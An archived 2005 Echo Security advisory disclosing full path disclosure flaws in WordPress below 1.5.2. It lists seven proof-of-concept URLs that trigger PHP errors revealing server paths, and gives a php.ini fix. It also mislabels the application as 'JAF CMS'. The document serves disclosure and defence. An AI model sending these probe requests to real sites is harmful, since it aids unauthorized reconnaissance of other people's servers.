Echo Security Advisory 2005.24

Echo Security Advisory 2005.24: Posted Dec 28, 2005; Authored by Echo Security, Dedi Dwianto | Site echo.or.id; WordPress versions less than 1.5.2 suffer from a full path disclosure vulnerability.; tags | advisory; SHA-256 | 626b96e62c1bbb752059b1d5b069a1c5b3997b53b9a508350b7f65ef793b6b62; Download | Favorite | View

Echo Security Advisory 2005.24

ECHO.OR.ID
ECHO_ADV_24$2005

---------------------------------------------------------------------------
[ECHO_ADV_24$2005] Full path disclosure on WordPress < 1.5.2
---------------------------------------------------------------------------

Author: Dedi Dwianto
Date: Dec, 20th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv24-theday-2005.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : JAF CMS
version: < 1.5.2
URL  : http://wordpress.org/
Description :

WordPress is a very popular personal publishing platform aka blog
software, and is used by everyone from celebrities, to government
officials, to non technical average joe's. 
---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Full path disclosure:

   A remote user can access the file directly to cause the system to display  
   an error message that indicates the installation path. The resulting error 
   message will disclose potentially sensitive installation path information 
   to the remote attacker.

  * http://victim/[WP Folder]/wp-includes/vars.php?PHP_SELF%20=dudul

  POC :
  
  http://localhost/blog/wp-includes/vars.php?PHP_SELF%20=dudul
  
  Fatal error: Call to undefined function: get_settings() in 
  /var/www/html/blog/wp-includes/vars.php on line 106

  
  * http://victim/[WP Folder]/wp-content/plugins/hello.php

  POC :

  http://localhost/blog/wp-content/plugins/hello.php

  Fatal error: Call to undefined function: wptexturize() in 
  /var/www/html/blog/wp-content/plugins/hello.php on line 44


  * http://victim/[WP Folder]/wp-admin/menu-header.php?self=dudul

  POC :
 
  http://localhost/blog/wp-admin/menu-header.php?self=dudul

  PHP Fatal error: Call to undefined function: get_admin_page_parent() in
  /var/www/html/blog/wp-admin/menu-header.php on line 6 
  Fatal error: Call to undefined function: get_admin_page_parent() in 
  /var/www/html/blog/wp-admin/menu-header.php on line 6


  * http://victim/[WP Folder]/wp-admin/upgrade-functions.php

  POC :

  http://localhost/[WP Folder]/wp-admin/upgrade-functions.php
  
  Warning: main(ABSPATH/wp-admin/admin-functions.php): failed to open stream: No such file or directory 
  in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3
  PHP Fatal error: main(): Failed opening required 'ABSPATH/wp-admin/admin-functions.php' 
  (include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3 
  Fatal error: main(): Failed opening required 'ABSPATH/wp-admin/admin-functions.php' 
  (include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3


  * http://victim/[WP FOlder]/wp-admin/edit-form.php

  POC :
   
  http://localhost/blog/wp-admin/edit-form.php

  PHP Fatal error: Call to undefined function: _e() in /var/www/html/blog/wp-admin/edit-form.php on line 3 
  Fatal error: Call to undefined function: _e() in /var/www/html/blog/wp-admin/edit-form.php on line 3

  * http://victim/[WP FOlder]/wp-settings.php

  
  POC : http://localhost/blog/wp-settings.php

  Warning: main(ABSPATHwp-includes/wp-db.php): failed to open stream: No such file or directory in
  /var/www/html/blog/wp-settings.php on line 59
  PHP Fatal error: main(): Failed opening required 'ABSPATHwp-includes/wp-db.php'
  (include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-settings.php on line 59 
  Fatal error: main(): Failed opening required 'ABSPATHwp-includes/wp-db.php' 
  (include_path='.:/usr/share/pear:/usr/local/lib/php') in /var/www/html/blog/wp-settings.php on line 59


  * http://victim/[WP FOlder]/wp-admin/edit-form-comment.php

  POC :
  
  http://localhost/blog/wp-admin/edit-form-comment.php

  Fatal error: Call to undefined function: __() in /var/www/html/blog/wp-admin/edit-form-comment.php on line 2


B. Fix

  For User and do not know how to fix the script , change php.ini file setting 
  then turn on log_errors , and turn off display_error

---------------------------------------------------------------------------

Shoutz:
~~~~~~~

~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ newbie_hacker@yahoogroups.com 
~ #e-c-h-o@DALNET

---------------------------------------------------------------------------
Contact:
~~~~~~~~

     the_day || echo|staff || the_day[at]echo[dot]or[dot]id
     Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

Top Authors In Last 30 Days

Red Hat 219 files
indoushka 83 files
Ubuntu 79 files
Gentoo 36 files
Jasper Nota 25 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,707)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,485)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,737)
UNIX (9,435)
UnixWare (187)
Windows (6,672)
Other

Echo Security Advisory 2005.24

Echo Security Advisory 2005.24

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Echo Security Advisory 2005.24

Share This

Echo Security Advisory 2005.24

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems